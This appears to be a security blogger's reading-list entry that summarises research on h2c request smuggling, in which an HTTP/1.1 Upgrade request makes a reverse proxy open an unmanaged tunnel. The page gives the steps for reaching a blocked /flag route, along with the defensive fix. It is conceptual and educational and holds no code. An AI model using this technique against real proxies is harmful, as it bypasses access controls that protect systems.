Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Where does one request start and another end? There is an issue in implementations of the HTTP protocol that gave wind to a vulnerability known as HTTP Smuggling. The author of this article expanded on this research and found a similar issue in HTTP2 in Cleartext (h2C).

Additionally, another researcher had discovered the ability to smuggle requests over websocket connections to bypass reverse proxy access controls in this article. The issue was triggered by upgrading a websocket connection.

Typically, HTTP/2 is initiated with a TLS negotiation. However, an HTTP/1.1 Upgrade header can also be used for cleartext communication, even when TLS has already been established. The author had to create a custom client in order to test this.

The author of this article wanted to see if the protocol upgrade issue on websockets could also be used with HTTP/2 protocol upgrades. So, they setup an Nginx configuration that denied access to a specific route (/flag) but not others. Making a direct request to the /flag route would return a 403 error.

By doing the following steps, the technique worked:

1. Client submits an HTTP/1.1 upgrade request the proxy.
2. The proxy forwards the Upgrade and Connection headers to the backend, which responds with "101 Switching Protocols" and prepares to receive HTTP2 communications.
3. Upon seeing the 101 response from the backend, the proxy upgrades the connection to an unmanaged TCP tunnel.
4. Using HTTP/2 multiplexing, a request is made to /flag and the data is returned because the the proxy is no longer monitoring the tunnel.

The crux of this issue is that the connection has turned into an unmanaged TCP tunnel. So, proxy servers need to not pass thru the Upgrade and Connection headers during the call to the backend. By default, only three proxies DO exactly this, while a large amount of them don't but can be configured to.

Bypassing access controls via tunneling is quite clever! The author took existing research and applied it to their own area; it definitely pays to read and apply small changes to existing research.